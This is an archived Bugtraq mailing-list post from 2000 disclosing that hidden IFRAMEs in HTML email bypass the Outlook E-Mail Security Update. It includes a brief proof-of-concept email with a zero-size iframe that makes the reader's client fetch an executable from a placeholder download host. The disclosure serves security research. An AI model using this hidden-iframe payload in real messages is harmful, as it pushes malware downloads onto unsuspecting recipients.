[15339] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Circumventing Outlook Security Update File Download Security With

daemon@ATHENA.MIT.EDU (cassius@HUSHMAIL.COM)
Wed Jun 14 17:56:14 2000

Message-Id:  <200006092151.OAA21033@mail5.hushmail.com>
Date:         Fri, 9 Jun 2000 14:33:33 -0800
Reply-To: cassius@HUSHMAIL.COM
From: cassius@HUSHMAIL.COM
To: BUGTRAQ@SECURITYFOCUS.COM

This is an update to my previous post on malicious URLs and Outlook.
You *can* circumvent the Outlook E-Mail Security Update with IFRAMEs.

Example:

% sendmail outlookuser@example.com
MIME-Version: 1.0
Content-Type: text/html
Subject: Fake Attachment

<html>
<iframe src='http://download.example.com/badfile.exe' height=0 width=0>
</html>"

>.

This will display an IE 'open/download' dialog if the message is viewed
in the preview pane or opened for reading.

So Outlook with the patch is still vulnerable to worms, virii and trojans.

IMPORTANT NOTICE:  If you are not using HushMail, this message could have been read easily by the many people who have access to your open personal email messages.
Get your FREE, totally secure email address at http://www.hushmail.com.


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[15339] in bugtraq

Circumventing Outlook Security Update File Download Security With

daemon@ATHENA.MIT.EDU (cassius@HUSHMAIL.COM)Wed Jun 14 17:56:14 2000

daemon@ATHENA.MIT.EDU (cassius@HUSHMAIL.COM)
Wed Jun 14 17:56:14 2000